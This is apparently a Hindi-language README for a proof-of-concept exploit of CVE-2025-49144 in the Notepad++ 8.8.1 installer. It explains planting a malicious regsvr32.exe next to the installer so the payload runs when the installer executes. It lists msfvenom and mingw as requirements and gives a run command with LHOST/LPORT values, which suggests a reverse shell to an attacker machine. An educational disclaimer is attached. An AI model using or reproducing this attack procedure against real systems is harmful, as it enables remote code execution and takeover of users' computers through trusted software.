
अवधारणा प्रमाण (PoC) जो Notepad++ 8.8.1 इंस्टॉलर में CVE-2025-49144 भेद्यता का शोषण करता है।
इस रिपॉजिटरी में एक कार्यात्मक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है जो Notepad++ 8.8.1 इंस्टॉलर में CVE-2025-49144 भेद्यता का शोषण करता है। दुर्भावनापूर्ण निष्पादन एक बाइनरी (regsvr32.exe) को असुरक्षित इंस्टॉलर के समान निर्देशिका में रखकर होता है। जब इंस्टॉलर निष्पादित होता है, तो यह संदर्भ प्राप्त करता है और पेलोड को ट्रिगर करता है।
⚠️ अस्वीकरण
यह कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम पर अनधिकृत उपयोग कानून का उल्लंघन हो सकता है।
लेखक इस उपकरण से जुड़े किसी भी दुरुपयोग या दुर्भावनापूर्ण गतिविधि के लिए जिम्मेदार नहीं है।
msfvenom (Metasploit Framework का भाग)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (मैन्युअल रूप से उसी निर्देशिका में रखा जाना चाहिए)python3 exploit.py -i <LHOST> -p <LPORT>
उदाहरण:
python3 exploit.py -i 192.168.100.10 -p 4444
इससे निम्नलिखित फ़ाइलें उत्पन्न होंगी:
[
]